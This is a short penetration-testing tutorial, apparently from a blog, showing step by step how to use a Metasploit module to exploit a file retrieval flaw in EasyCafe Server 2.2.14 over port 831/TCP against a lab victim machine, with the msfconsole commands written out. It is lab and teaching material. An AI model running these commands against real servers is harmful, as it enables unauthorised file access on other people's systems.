Subscribe to Blog via Email

Categories

Archives

Kali Linux, Penetration Testing

Finding Vulnerability in EasyCafe Server using Metasploit

This module exploits file retrieval vulnerability in EasyCafe Server. The vulnerability can be triggered by sending a specially crafted packet (opcode 0x43) to the 831/TCP port. This module has been successfully tested on EasyCafe Server version 2.2.14 (Trial mode and Demo mode) on Windows XP SP3 and Windows 7 SP1. Note that the server will throw a popup messagebox if the specified file does not exist.

Exploit Targets

EasyCafe Server version 2.2.14

Requirement

Attacker: kali Linux

Victim PC: Windows 7

Open Kali terminal type msfconsole

Now type use auxiliary/scanner/misc/easycafe_server_fileaccess

msf exploit (easycafe_server_fileaccess)>set rhosts 192.168.0.103

msf exploit (easycafe_server_fileaccess)>set rport 831

msf exploit (easycafe_server_fileaccess)>exploit

The result will be saved on /root/.msf4/ directory

Leave a Reply

Your email address will not be published. Required fields are marked *